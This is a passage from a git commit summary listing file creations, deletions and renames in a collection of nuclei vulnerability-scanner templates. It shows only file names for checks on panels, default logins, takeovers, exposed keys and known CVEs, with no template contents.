nuclei-templates/Other/active-admin-exposure-41.yaml delete mode 100644 nuclei-templates/Other/active-admin-exposure-42.yaml rename nuclei-templates/Other/{activemq-panel-50.yaml => activemq-panel-53.yaml} (100%) create mode 100644 nuclei-templates/Other/acunetix-panel-56.yaml delete mode 100644 nuclei-templates/Other/acunetix-panel-59.yaml rename nuclei-templates/Other/{adb-backup-enabled-60.yaml => adb-backup-enabled.yaml} (100%) create mode 100644 nuclei-templates/Other/addeventlistener-detect-64.yaml delete mode 100644 nuclei-templates/Other/addeventlistener-detect-65.yaml create mode 100644 nuclei-templates/Other/adiscon-loganalyzer-68.yaml create mode 100644 nuclei-templates/Other/adminer-panel-fuzz-72.yaml delete mode 100644 nuclei-templates/Other/adminer-panel-fuzz.yaml rename nuclei-templates/Other/{adminer-panel-74.yaml => adminer-panel.yaml} (100%) rename nuclei-templates/Other/{adminset-panel-78.yaml => adminset-panel-80.yaml} (100%) create mode 100644 nuclei-templates/Other/adobe-coldfusion-detect-82.yaml delete mode 100644 nuclei-templates/Other/adobe-coldfusion-detect.yaml create mode 100644 nuclei-templates/Other/adobe-component-login-91.yaml delete mode 100644 nuclei-templates/Other/adobe-component-login-92.yaml rename nuclei-templates/Other/{adobe-connect-central-login-95.yaml => adobe-connect-central-login-93.yaml} (100%) rename nuclei-templates/Other/{adobe-connect-username-exposure-100.yaml => adobe-connect-username-exposure-101.yaml} (100%) rename nuclei-templates/Other/{adobe-experience-manager-login-105.yaml => adobe-experience-manager-login.yaml} (100%) create mode 100644 nuclei-templates/Other/adobe-media-server-112.yaml delete mode 100644 nuclei-templates/Other/adobe-media-server.yaml create mode 100644 nuclei-templates/Other/advance-setup-119.yaml delete mode 100644 nuclei-templates/Other/advance-setup-120.yaml delete mode 100644 nuclei-templates/Other/advance-setup-122.yaml create mode 100644 nuclei-templates/Other/advance-setup-123.yaml delete mode 100644 nuclei-templates/Other/advanced-access-manager-lfi.yaml rename nuclei-templates/Other/{aem-bg-servlet.yaml => aem-bg-servlet-127.yaml} (100%) rename nuclei-templates/Other/{aem-crx-bypass-133.yaml => aem-crx-bypass.yaml} (100%) delete mode 100644 nuclei-templates/Other/aem-default-get-servlet-136.yaml create mode 100644 nuclei-templates/Other/aem-default-get-servlet-138.yaml rename nuclei-templates/Other/{aem-detection-145.yaml => aem-detection-146.yaml} (100%) rename nuclei-templates/Other/{aem-gql-servlet.yaml => aem-gql-servlet-149.yaml} (100%) create mode 100644 nuclei-templates/Other/aem-groovyconsole.yaml delete mode 100644 nuclei-templates/Other/aem-hash-querybuilder-157.yaml create mode 100644 nuclei-templates/Other/aem-hash-querybuilder-160.yaml rename nuclei-templates/Other/{aem-jcr-querybuilder-166.yaml => aem-jcr-querybuilder-162.yaml} (100%) rename nuclei-templates/Other/{aem-login-status-170.yaml => aem-login-status-169.yaml} (100%) delete mode 100644 nuclei-templates/Other/aem-merge-metadata-servlet-172.yaml create mode 100644 nuclei-templates/Other/aem-merge-metadata-servlet-174.yaml rename nuclei-templates/Other/{aem-querybuilder-feed-servlet-177.yaml => aem-querybuilder-feed-servlet-175.yaml} (100%) create mode 100644 nuclei-templates/Other/aem-querybuilder-internal-path-read-181.yaml delete mode 100644 nuclei-templates/Other/aem-querybuilder-internal-path-read.yaml delete mode 100644 nuclei-templates/Other/aem-secrets.yaml create mode 100644 nuclei-templates/Other/aem-userinfo-servlet-192.yaml delete mode 100644 nuclei-templates/Other/aem-userinfo-servlet-193.yaml rename nuclei-templates/Other/{aem-wcm-suggestions-servlet.yaml => aem-wcm-suggestions-servlet-196.yaml} (100%) delete mode 100644 nuclei-templates/Other/aem-xss-childlist-selector-197.yaml create mode 100644 nuclei-templates/Other/aem-xss-childlist-selector.yaml rename nuclei-templates/Other/{aem-misconfig.yaml => aem_misconfig.yaml} (100%) rename nuclei-templates/Other/{aerohive-netconfig-ui-201.yaml => aerohive-netconfig-ui.yaml} (100%) create mode 100644 nuclei-templates/Other/aftership-takeover-202.yaml delete mode 100644 nuclei-templates/Other/aftership-takeover-203.yaml create mode 100644 nuclei-templates/Other/agilecrm-takeover-208.yaml delete mode 100644 nuclei-templates/Other/agilecrm-takeover-212.yaml create mode 100644 nuclei-templates/Other/aha-takeover-214.yaml delete mode 100644 nuclei-templates/Other/aha-takeover.yaml rename nuclei-templates/Other/{AIC-leakage.yaml => aic-leakage.yaml} (100%) rename nuclei-templates/Other/{aims-password-mgmt-client-221.yaml => aims-password-mgmt-client.yaml} (100%) create mode 100644 nuclei-templates/Other/aims-password-portal-224.yaml delete mode 100644 nuclei-templates/Other/aims-password-portal.yaml create mode 100644 nuclei-templates/Other/airee-takeover-226.yaml delete mode 100644 nuclei-templates/Other/airee-takeover-228.yaml delete mode 100644 nuclei-templates/Other/airflow-debug-231.yaml create mode 100644 nuclei-templates/Other/airflow-debug-233.yaml create mode 100644 nuclei-templates/Other/airflow-default-login-234.yaml delete mode 100644 nuclei-templates/Other/airflow-default-login.yaml rename nuclei-templates/Other/{airflow-detect-240.yaml => airflow-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/airflow-panel-241.yaml create mode 100644 nuclei-templates/Other/airflow-panel-244.yaml delete mode 100644 nuclei-templates/Other/airflow-panel-245.yaml create mode 100644 nuclei-templates/Other/airflow-panel.yaml delete mode 100644 nuclei-templates/Other/akamai-cloudtest-252.yaml create mode 100644 nuclei-templates/Other/akamai-cloudtest-254.yaml create mode 100644 nuclei-templates/Other/alfresco-detect-258.yaml delete mode 100644 nuclei-templates/Other/alfresco-detect-259.yaml delete mode 100644 nuclei-templates/Other/alibaba-canal-info-leak-266.yaml create mode 100644 nuclei-templates/Other/alibaba-canal-info-leak.yaml create mode 100644 nuclei-templates/Other/alibaba-cloud-code-env.yaml rename nuclei-templates/Other/{alibaba-mongoshake-unauth-268.yaml => alibaba-mongoshake-unauth-270.yaml} (100%) delete mode 100644 nuclei-templates/Other/alienvault-usm-271.yaml create mode 100644 nuclei-templates/Other/alienvault-usm-274.yaml delete mode 100644 nuclei-templates/Other/alphaweb-default-login-275.yaml create mode 100644 nuclei-templates/Other/alphaweb-default-login-277.yaml delete mode 100644 "nuclei-templates/Other/amazon-mws-auth-token_\351\207\215\345\244\215\345\211\257\346\234\254.yaml" delete mode 100644 nuclei-templates/Other/ambari-default-login-289.yaml create mode 100644 nuclei-templates/Other/ambari-default-login.yaml delete mode 100644 nuclei-templates/Other/ambari-exposure-291.yaml create mode 100644 nuclei-templates/Other/ambari-exposure.yaml create mode 100644 nuclei-templates/Other/amcrest-login-296.yaml delete mode 100644 nuclei-templates/Other/amcrest-login-299.yaml rename nuclei-templates/Other/{ametys-admin-login-301.yaml => ametys-admin-login.yaml} (100%) create mode 100644 nuclei-templates/Other/ampps-admin-panel-306.yaml delete mode 100644 nuclei-templates/Other/ampps-admin-panel.yaml rename nuclei-templates/Other/{ampps-dirlisting-308.yaml => ampps-dirlisting-307.yaml} (100%) rename nuclei-templates/Other/{ampps-panel-310.yaml => ampps-panel-309.yaml} (100%) rename nuclei-templates/Other/{android-debug-database-exposed-314.yaml => android-debug-database-exposed-316.yaml} (100%) create mode 100644 nuclei-templates/Other/anima-takeover-318.yaml delete mode 100644 nuclei-templates/Other/anima-takeover-320.yaml rename nuclei-templates/Other/{Anni-fileDownload.yaml => anni-filedownload.yaml} (100%) create mode 100644 nuclei-templates/Other/announcekit-takeover-321.yaml delete mode 100644 nuclei-templates/Other/announcekit-takeover.yaml delete mode 100644 nuclei-templates/Other/ansible-tower-exposure-331.yaml create mode 100644 nuclei-templates/Other/ansible-tower-exposure-332.yaml rename nuclei-templates/Other/{AolynkBR304-weakPass.yaml => aolynkbr304-weakpass.yaml} (100%) rename nuclei-templates/Other/{apache-apisix-panel-338.yaml => apache-apisix-panel-336.yaml} (100%) rename nuclei-templates/Other/{apache-axis-detect.yaml => apache-axis-detect-340.yaml} (100%) rename nuclei-templates/Other/{apache-cocoon-detect-342.yaml => apache-cocoon-detect.yaml} (100%) rename nuclei-templates/Other/{apache-config.yaml => apache-config-344.yaml} (100%) create mode 100644 nuclei-templates/Other/apache-detect-348.yaml delete mode 100644 nuclei-templates/Other/apache-detect.yaml create mode 100644 nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml rename nuclei-templates/Other/{apache-dubbo-detect.yaml => apache-dubbo-detect-351.yaml} (100%) rename nuclei-templates/Other/{apache-filename-brute-force.yaml => apache-filename-brute-force-352.yaml} (100%) rename nuclei-templates/Other/{apache-filename-enum.yaml => apache-filename-enum-354.yaml} (100%) create mode 100644 nuclei-templates/Other/apache-flink-unauth-rce-355.yaml delete mode 100644 nuclei-templates/Other/apache-flink-unauth-rce-356.yaml create mode 100644 nuclei-templates/Other/apache-flink.yaml delete mode 100644 nuclei-templates/Other/apache-loadbalancer-364.yaml create mode 100644 nuclei-templates/Other/apache-loadbalancer-365.yaml rename nuclei-templates/Other/{apache-solr-log4j-rce.yaml => apache-solr-log4j-rce-372.yaml} (100%) create mode 100644 nuclei-templates/Other/apache-tomcat-CVE-2022-34305.yaml delete mode 100644 nuclei-templates/Other/apache-tomcat-cve-2022-34305.yaml rename nuclei-templates/Other/{apache-tomcat-snoop-374.yaml => apache-tomcat-snoop-375.yaml} (100%) rename nuclei-templates/Other/{apc-info-380.yaml => apc-info-378.yaml} (100%) rename nuclei-templates/Other/{apc-ups-login-381.yaml => apc-ups-login-382.yaml} (100%) rename nuclei-templates/Other/{api-abuseipdb-385.yaml => api-abuseipdb-384.yaml} (100%) rename nuclei-templates/Other/{api-accuweather.yaml => api-accuweather-386.yaml} (100%) rename nuclei-templates/Other/{api-adafruit-io.yaml => api-adafruit-io-387.yaml} (100%) rename nuclei-templates/Other/{api-apigee-edge-391.yaml => api-apigee-edge.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-asana.yaml rename nuclei-templates/Other/{api-bible-394.yaml => api-bible.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-bingmaps-395.yaml rename nuclei-templates/Other/{api-bitrise.yaml => api-bitrise-397.yaml} (100%) rename nuclei-templates/Other/{api-blockchain.yaml => api-blockchain-399.yaml} (100%) rename nuclei-templates/Other/{api-bravenewcoin.yaml => api-bravenewcoin-401.yaml} (100%) rename nuclei-templates/Other/{buildkite.yaml => api-buildkite-402.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-buttercms-403.yaml create mode 100644 nuclei-templates/Other/api-calendly-404.yaml delete mode 100644 nuclei-templates/Other/api-calendly.yaml rename nuclei-templates/Other/{api-cooperhewitt-411.yaml => api-cooperhewitt-409.yaml} (100%) rename nuclei-templates/Other/{api-dbt.yaml => api-dbt-413.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-debounce-414.yaml create mode 100644 nuclei-templates/Other/api-debounce.yaml rename nuclei-templates/Other/{api-dribbble.yaml => api-dribbble-416.yaml} (100%) rename nuclei-templates/Other/{api-facebook-422.yaml => api-facebook.yaml} (100%) rename nuclei-templates/Other/{api-fontawesome-426.yaml => api-fontawesome.yaml} (100%) rename nuclei-templates/Other/{api-fortitoken-cloud.yaml => api-fortitoken-cloud-427.yaml} (100%) rename nuclei-templates/Other/{api-github-429.yaml => api-github.yaml} (100%) create mode 100644 nuclei-templates/Other/api-heroku-435.yaml delete mode 100644 nuclei-templates/Other/api-heroku.yaml rename nuclei-templates/Other/{api-hubspot.yaml => api-hubspot-437.yaml} (100%) rename nuclei-templates/Other/{api-iconfinder-438.yaml => api-iconfinder.yaml} (100%) rename nuclei-templates/Other/{api-improvmx-440.yaml => api-improvmx.yaml} (100%) rename nuclei-templates/Other/{instagram.yaml => api-instagram-441.yaml} (100%) rename nuclei-templates/Other/{api-instatus-442.yaml => api-instatus.yaml} (100%) rename nuclei-templates/Other/{api-intercom-443.yaml => api-intercom.yaml} (100%) create mode 100644 nuclei-templates/Other/api-ipstack.yaml delete mode 100644 nuclei-templates/Other/api-iterable-445.yaml create mode 100644 nuclei-templates/Other/api-iterable.yaml create mode 100644 nuclei-templates/Other/api-jumpcloud-446.yaml rename nuclei-templates/Other/{api-launchdarkly.yaml => api-launchdarkly-449.yaml} (100%) create mode 100644 nuclei-templates/Other/api-linkfinder.yaml delete mode 100644 nuclei-templates/Other/api-loqate-453.yaml create mode 100644 nuclei-templates/Other/api-loqate.yaml rename nuclei-templates/Other/{api-mailchimp-454.yaml => api-mailchimp.yaml} (100%) rename nuclei-templates/Other/{api-malshare-457.yaml => api-malshare-456.yaml} (100%) rename nuclei-templates/Other/{api-mapbox.yaml => api-mapbox-465.yaml} (100%) rename nuclei-templates/Other/{api-mojoauth-466.yaml => api-mojoauth.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-nerdgraph-469.yaml create mode 100644 nuclei-templates/Other/api-nerdgraph.yaml create mode 100644 nuclei-templates/Other/api-npm-471.yaml rename nuclei-templates/Other/{openweather.yaml => api-openweather-473.yaml} (100%) create mode 100644 nuclei-templates/Other/api-pagerduty-475.yaml rename nuclei-templates/Other/{api-pastebin.yaml => api-pastebin-477.yaml} (100%) rename nuclei-templates/Other/{pendo.yaml => api-pendo.yaml} (100%) rename nuclei-templates/Other/{api-quip-484.yaml => api-quip.yaml} (100%) rename nuclei-templates/Other/{api-rijksmuseum.yaml => api-rijksmuseum-486.yaml} (100%) rename nuclei-templates/Other/{api-scanii-487.yaml => api-scanii.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-slack-493.yaml delete mode 100644 nuclei-templates/Other/api-square-496.yaml create mode 100644 nuclei-templates/Other/api-square.yaml rename nuclei-templates/Other/{api-stytch-500.yaml => api-stytch.yaml} (100%) rename nuclei-templates/Other/{api-tink-504.yaml => api-tink.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-tinypng.yaml rename nuclei-templates/Other/{api-twitter-507.yaml => api-twitter.yaml} (100%) rename nuclei-templates/Other/{api-urlscan-508.yaml => api-urlscan-509.yaml} (100%) rename nuclei-templates/Other/{api-vercel.yaml => api-vercel-510.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-visualstudio-513.yaml create mode 100644 nuclei-templates/Other/api-visualstudio.yaml create mode 100644 nuclei-templates/Other/api-weglot-516.yaml delete mode 100644 nuclei-templates/Other/api-weglot.yaml create mode 100644 nuclei-templates/Other/api-wordcloud-518.yaml delete mode 100644 nuclei-templates/Other/api-wordcloud.yaml rename nuclei-templates/Other/{api-youtube.yaml => api-youtube-519.yaml} (100%) rename nuclei-templates/Other/{apiman-panel-460.yaml => apiman-panel-464.yaml} (100%) rename nuclei-templates/Other/{apisix-default-login-492.yaml => apisix-default-login-490.yaml} (100%) delete mode 100644 nuclei-templates/Other/apollo-server-detect-522.yaml create mode 100644 nuclei-templates/Other/apollo-server-detect-523.yaml rename nuclei-templates/Other/{appspec-yml-disclosure-528.yaml => appspec-yml-disclosure-529.yaml} (100%) rename nuclei-templates/Other/{arcgis-rest-api-532.yaml => arcgis-rest-api.yaml} (100%) delete mode 100644 nuclei-templates/Other/argocd-detect.yaml create mode 100644 nuclei-templates/Other/argocd-login.yaml delete mode 100644 nuclei-templates/Other/arl-default-login-537.yaml create mode 100644 nuclei-templates/Other/arl-default-login.yaml create mode 100644 nuclei-templates/Other/artica-web-proxy-detect-543.yaml delete mode 100644 nuclei-templates/Other/artica-web-proxy-detect-544.yaml delete mode 100644 nuclei-templates/Other/artifactory-anonymous-deploy-549.yaml create mode 100644 nuclei-templates/Other/artifactory-anonymous-deploy.yaml create mode 100644 nuclei-templates/Other/asana.yaml create mode 100644 nuclei-templates/Other/asanhamayesh-lfi-552.yaml delete mode 100644 nuclei-templates/Other/asanhamayesh-lfi.yaml delete mode 100644 nuclei-templates/Other/aspose-pdf-file-download.yaml rename nuclei-templates/{wordpress => Other}/aspose-words-file-download.yaml (100%) rename nuclei-templates/Other/{aspx-debug-mode-575.yaml => aspx-debug-mode-579.yaml} (100%) rename nuclei-templates/Other/{atlassian-crowd-panel-584.yaml => atlassian-crowd-panel-585.yaml} (100%) rename nuclei-templates/Other/{atvise-login-590.yaml => atvise-login-589.yaml} (100%) rename nuclei-templates/Other/{automation-direct-596.yaml => automation-direct-597.yaml} (100%) delete mode 100644 nuclei-templates/Other/avantfax-panel-602.yaml create mode 100644 nuclei-templates/Other/avantfax-panel-603.yaml delete mode 100644 nuclei-templates/Other/avatier-password-management-605.yaml create mode 100644 nuclei-templates/Other/avatier_password_management.yaml rename nuclei-templates/Other/{aviatrix-panel.yaml => aviatrix-panel-610.yaml} (100%) rename nuclei-templates/Other/{avtech-avn801-camera-panel.yaml => avtech-avn801-camera-panel-613.yaml} (100%) rename nuclei-templates/Other/{AVTECH-login-bypass.yaml => avtech-login-bypass.yaml} (100%) rename nuclei-templates/Other/{aws-access-id.yaml => aws-access-id-618.yaml} (100%) rename nuclei-templates/Other/{aws-access-key-value-625.yaml => aws-access-key-value-622.yaml} (100%) rename nuclei-templates/Other/{aws-cognito-638.yaml => aws-cognito-636.yaml} (100%) rename nuclei-templates/Other/{aws-ecs-container-agent-tasks.yaml => aws-ecs-container-agent-tasks-641.yaml} (100%) rename nuclei-templates/Other/{aws-elastic-beanstalk-detect-643.yaml => aws-elastic-beanstalk-detect-644.yaml} (100%) rename nuclei-templates/Other/{aws-object-listing-646.yaml => aws-object-listing-648.yaml} (100%) delete mode 100644 nuclei-templates/Other/aws-opensearch-login-649.yaml create mode 100644 nuclei-templates/Other/aws-opensearch-login.yaml rename nuclei-templates/Other/{aws-redirect-652.yaml => aws-redirect-654.yaml} (100%) rename nuclei-templates/Other/{awstats-config-655.yaml => awstats-config-656.yaml} (100%) rename nuclei-templates/Other/{axigen-webadmin-659.yaml => axigen-webadmin-661.yaml} (100%) create mode 100644 nuclei-templates/Other/axis-happyaxis-669.yaml delete mode 100644 nuclei-templates/Other/axis-happyaxis-670.yaml rename nuclei-templates/Other/{azkaban-default-login-671.yaml => azkaban-default-login.yaml} (100%) create mode 100644 nuclei-templates/Other/azure-takeover-detection-681.yaml delete mode 100644 nuclei-templates/Other/azure-takeover-detection.yaml rename nuclei-templates/Other/{B2BBuilder-sqli.yaml => b2bbuilder-sqli.yaml} (100%) rename nuclei-templates/Other/{barracuda-panel-685.yaml => barracuda-panel-684.yaml} (100%) rename nuclei-templates/Other/{baseurl (copy 1).yaml => baseurl.yaml} (100%) rename nuclei-templates/Other/{basic-cors-misconfig.yaml => basic-cors-692.yaml} (100%) delete mode 100644 nuclei-templates/Other/basic_sqli.yaml rename nuclei-templates/Other/{bazarr-login-703.yaml => bazarr-login-702.yaml} (100%) create mode 100644 nuclei-templates/Other/bems-api-lfi-710.yaml delete mode 100644 nuclei-templates/Other/bems-api-lfi-711.yaml delete mode 100644 nuclei-templates/Other/beward-ipcamera-disclosure-715.yaml create mode 100644 nuclei-templates/Other/beward-ipcamera-disclosure.yaml delete mode 100644 nuclei-templates/Other/beyondtrust-login-server-718.yaml create mode 100644 nuclei-templates/Other/beyondtrust-login-server.yaml rename nuclei-templates/Other/{beyondtrust-panel-721.yaml => beyondtrust-panel.yaml} (100%) create mode 100644 nuclei-templates/Other/bigbluebutton-detect-723.yaml delete mode 100644 nuclei-templates/Other/bigbluebutton-detect.yaml create mode 100644 nuclei-templates/Other/bigbluebutton-login-726.yaml delete mode 100644 nuclei-templates/Other/bigbluebutton-login.yaml rename nuclei-templates/Other/{bigip-config-utility-detect.yaml => bigip-config-utility-detect-733.yaml} (100%) create mode 100644 nuclei-templates/Other/bigip.yaml create mode 100644 nuclei-templates/Other/bingmaps.yaml rename nuclei-templates/Other/{Biometric-detect.yaml => biometric-detect-737.yaml} (100%) rename nuclei-templates/Other/{bitbucket-takeover.yaml => bitbucket-takeover-739.yaml} (100%) delete mode 100644 nuclei-templates/Other/bitrix-panel-746.yaml create mode 100644 nuclei-templates/Other/bitrix-panel-749.yaml rename nuclei-templates/Other/{blue-iris-login-753.yaml => blue-iris-login-751.yaml} (100%) rename nuclei-templates/Other/{bolt-cms-panel.yaml => bolt-cms-panel-763.yaml} (100%) delete mode 100644 nuclei-templates/Other/booked.yaml delete mode 100644 nuclei-templates/Other/bookstack-detect-765.yaml create mode 100644 nuclei-templates/Other/bookstack-detect.yaml delete mode 100644 nuclei-templates/Other/bower-json-770.yaml create mode 100644 nuclei-templates/Other/bower-json.yaml rename nuclei-templates/Other/{braintree-access-token.yaml => braintree-access-token-771.yaml} (100%) mode change 100644 => 100755 rename nuclei-templates/Other/{branch-key.yaml => branch-key-774.yaml} (100%) create mode 100644 nuclei-templates/Other/brightcove-takeover-785.yaml delete mode 100644 nuclei-templates/Other/brightcove-takeover.yaml rename nuclei-templates/Other/{brother-printer-detect-790.yaml => brother-printer-detect-789.yaml} (100%) rename nuclei-templates/Other/{browserless-debugger-794.yaml => browserless-debugger-795.yaml} (100%) delete mode 100644 nuclei-templates/Other/bsqli-time-based.yaml delete mode 100644 nuclei-templates/Other/buddy-panel-797.yaml create mode 100644 nuclei-templates/Other/buddy-panel.yaml rename nuclei-templates/Other/{buffalo-config-injection-798.yaml => buffalo-config-injection-801.yaml} (100%) create mode 100644 nuclei-templates/Other/buildbot-panel-803.yaml delete mode 100644 nuclei-templates/Other/buildbot-panel.yaml create mode 100644 nuclei-templates/Other/bullwark-momentum-lfi-807.yaml delete mode 100644 nuclei-templates/Other/bullwark-momentum-lfi-808.yaml create mode 100644 nuclei-templates/Other/businessintelligence-default-login-814.yaml delete mode 100644 nuclei-templates/Other/businessintelligence-default-login-816.yaml create mode 100644 nuclei-templates/Other/buttercms.yaml delete mode 100644 nuclei-templates/Other/cache-poisoning-822.yaml create mode 100644 nuclei-templates/Other/cache-poisoning-823.yaml rename nuclei-templates/Other/{cacti-detect-827.yaml => cacti-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/cacti-panel-828.yaml delete mode 100644 nuclei-templates/Other/cacti-panel-829.yaml rename nuclei-templates/Other/{call-break-cms.yaml => call-break-cms-838.yaml} (100%) delete mode 100644 nuclei-templates/Other/camunda-login-panel-845.yaml create mode 100644 nuclei-templates/Other/camunda-login-panel.yaml rename nuclei-templates/Other/{can-i-take-over-dns-853.yaml => can-i-take-over-dns.yaml} (100%) rename nuclei-templates/Other/{canal-default-login-846.yaml => canal-default-login-849.yaml} (100%) rename nuclei-templates/Other/{canny-takeover.yaml => canny-takeover-855.yaml} (100%) delete mode 100644 nuclei-templates/Other/cargo-takeover-868.yaml create mode 100644 nuclei-templates/Other/cargo-takeover-869.yaml rename nuclei-templates/Other/{cargocollective-takeover.yaml => cargocollective-takeover-864.yaml} (100%) rename nuclei-templates/Other/{caucho-resin-info-disclosure-872.yaml => caucho-resin-info-disclosure-871.yaml} (100%) rename nuclei-templates/Other/{centreon-detect-875.yaml => centreon-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/ceph.yaml create mode 100644 nuclei-templates/Other/certificate-validation-884.yaml delete mode 100644 nuclei-templates/Other/certificate-validation.yaml rename nuclei-templates/Other/{cgi-test-page-887.yaml => cgi-test-page-888.yaml} (100%) rename nuclei-templates/Other/{chamilo-lms-sqli-891.yaml => chamilo-lms-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/chamilo-lms-xss-893.yaml create mode 100644 nuclei-templates/Other/chamilo-lms-xss.yaml rename nuclei-templates/Other/{chanjet-CRM-sqli.yaml => chanjet-crm-sqli.yaml} (100%) rename nuclei-templates/Other/{cheatset-disclosure.yaml => cheatset.yaml} (100%) rename nuclei-templates/Other/{checkmarx-panel.yaml => checkmarx-panel-895.yaml} (100%) create mode 100644 nuclei-templates/Other/chevereto-detect-905.yaml delete mode 100644 nuclei-templates/Other/chevereto-detect.yaml create mode 100644 nuclei-templates/Other/chinaunicom-default-login-908.yaml delete mode 100644 nuclei-templates/Other/chinaunicom-default-login-909.yaml delete mode 100644 nuclei-templates/Other/circleci-config-924.yaml create mode 100644 nuclei-templates/Other/circleci-config.yaml rename nuclei-templates/Other/{cisco-finesse-login-938.yaml => cisco-finesse-login-940.yaml} (100%) delete mode 100644 nuclei-templates/Other/cisco-network-config-948.yaml create mode 100644 nuclei-templates/Other/cisco-network-config-949.yaml rename nuclei-templates/Other/{cisco-secure-desktop-960.yaml => cisco-secure-desktop-962.yaml} (100%) create mode 100644 nuclei-templates/Other/cisco-sendgrid-965.yaml delete mode 100644 nuclei-templates/Other/cisco-sendgrid-969.yaml delete mode 100644 nuclei-templates/Other/cisco-smi-exposure-970.yaml create mode 100644 nuclei-templates/Other/cisco-smi-exposure-971.yaml rename nuclei-templates/Other/{cisco-systems-login-975.yaml => cisco-systems-login-973.yaml} (100%) rename nuclei-templates/Other/{cisco-telepresence-978.yaml => cisco-telepresence.yaml} (100%) rename nuclei-templates/Other/{cisco-ucs-kvm-login-979.yaml => cisco-ucs-kvm-login.yaml} (100%) delete mode 100644 nuclei-templates/Other/citrix-vpn-detect-984.yaml create mode 100644 nuclei-templates/Other/citrix-vpn-detect-987.yaml rename nuclei-templates/Other/{ckan-dom-based-xss-990.yaml => ckan-dom-based-xss-992.yaml} (100%) rename nuclei-templates/Other/{clave-login-panel-996.yaml => clave-login-panel-994.yaml} (100%) delete mode 100644 nuclei-templates/Other/clearpass-policy-manager-997.yaml create mode 100644 nuclei-templates/Other/clearpass-policy-manager.yaml create mode 100644 nuclei-templates/Other/cleo-detect.yaml rename nuclei-templates/Other/{clickhouse-unauth-1004.yaml => clickhouse-unauth.yaml} (100%) delete mode 100644 nuclei-templates/Other/clientaccesspolicy-1006.yaml create mode 100644 nuclei-templates/Other/clientaccesspolicy.yaml delete mode 100644 nuclei-templates/Other/clockwork-dashboard-exposure-1012.yaml create mode 100644 nuclei-templates/Other/clockwork-dashboard-exposure-1014.yaml rename nuclei-templates/Other/{clockwork-php-page-1016.yaml => clockwork-php-page.yaml} (100%) delete mode 100644 nuclei-templates/Other/cloudflare-image-ssrf-1022.yaml create mode 100644 nuclei-templates/Other/cloudflare-image-ssrf-1023.yaml delete mode 100644 nuclei-templates/Other/cloudinary-1025.yaml create mode 100644 nuclei-templates/Other/cloudinary-1026.yaml rename nuclei-templates/Other/{ruby-open-rce.yaml => cmdi-ruby-open-rce.yaml} (100%) rename nuclei-templates/Other/{cname-service-detector-1033.yaml => cname-service-detector.yaml} (100%) rename nuclei-templates/Other/{cnvd-2018-13393-1038.yaml => cnvd-2018-13393-1039.yaml} (100%) create mode 100644 nuclei-templates/Other/cnvd-2019-01348-1040.yaml delete mode 100644 nuclei-templates/Other/cnvd-2019-01348-1042.yaml create mode 100644 nuclei-templates/Other/cnvd-2019-06255-1048.yaml delete mode 100644 nuclei-templates/Other/cnvd-2020-46552-1060.yaml create mode 100644 nuclei-templates/Other/cnvd-2020-46552.yaml delete mode 100644 nuclei-templates/Other/cnvd-2020-56167-1061.yaml create mode 100644 nuclei-templates/Other/cnvd-2020-56167-1062.yaml create mode 100644 nuclei-templates/Other/cnvd-2020-67113-1072.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-01931-1079.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-10543-1082.yaml rename nuclei-templates/Other/{cnvd-2021-14536-1088.yaml => cnvd-2021-14536-1087.yaml} (100%) delete mode 100644 nuclei-templates/Other/cnvd-2021-15824-1096.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-15824-1097.yaml rename nuclei-templates/Other/{cnvd-2021-28277-1105.yaml => cnvd-2021-28277-1107.yaml} (100%) delete mode 100644 nuclei-templates/Other/cnvd-2021-30167-1109.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-30167-1110.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-49104-1113.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-49104-1114.yaml create mode 100644 nuclei-templates/Other/cnvd-2022-03672-1117.yaml delete mode 100644 nuclei-templates/Other/cobbler-default-login-1118.yaml create mode 100644 nuclei-templates/Other/cobbler-default-login-1120.yaml rename nuclei-templates/Other/{cockpit-workflow.yaml => cockpit-workflow-1129.yaml} (100%) create mode 100644 nuclei-templates/Other/code42-log4j-rce-1131.yaml delete mode 100644 nuclei-templates/Other/code42-log4j-rce-1132.yaml delete mode 100644 nuclei-templates/Other/codeigniter-env-1133.yaml create mode 100644 nuclei-templates/Other/codeigniter-env-1134.yaml rename nuclei-templates/Other/{codemeter-webadmin-panel.yaml => codemeter-webadmin-panel-1138.yaml} (100%) create mode 100644 nuclei-templates/Other/cofense-vision-panel-1141.yaml delete mode 100644 nuclei-templates/Other/cofense-vision-panel.yaml rename nuclei-templates/Other/{cold-fusion-cfcache-map-1149.yaml => cold-fusion-cfcache-map-1148.yaml} (100%) rename nuclei-templates/Other/{coldfusion-debug-xss-1153.yaml => coldfusion-debug-xss-1155.yaml} (100%) rename nuclei-templates/Other/{commax-credentials-disclosure-1160.yaml => commax-credentials-disclosure.yaml} (100%) rename nuclei-templates/Other/{comtrend-password-exposure.yaml => comtrend-password-exposure-1168.yaml} (100%) create mode 100644 nuclei-templates/Other/concrete-xss-1177.yaml delete mode 100644 nuclei-templates/Other/concrete-xss-1178.yaml create mode 100644 nuclei-templates/Other/concrete5-install-1171.yaml delete mode 100644 nuclei-templates/Other/concrete5-install.yaml rename nuclei-templates/Other/{concrete5-panel-1173.yaml => concrete5-panel.yaml} (100%) create mode 100644 nuclei-templates/Other/config-rb-1179.yaml delete mode 100644 nuclei-templates/Other/config-rb-1180.yaml create mode 100644 nuclei-templates/Other/config.yaml delete mode 100644 nuclei-templates/Other/configuration-listing-1182.yaml create mode 100644 nuclei-templates/Other/configuration-listing-1184.yaml delete mode 100644 nuclei-templates/Other/confluence-ssrf-sharelinks-1190.yaml create mode 100644 nuclei-templates/Other/confluence-ssrf-sharelinks-1193.yaml rename nuclei-templates/Other/{contacam.yaml => contacam-1198.yaml} (100%) rename 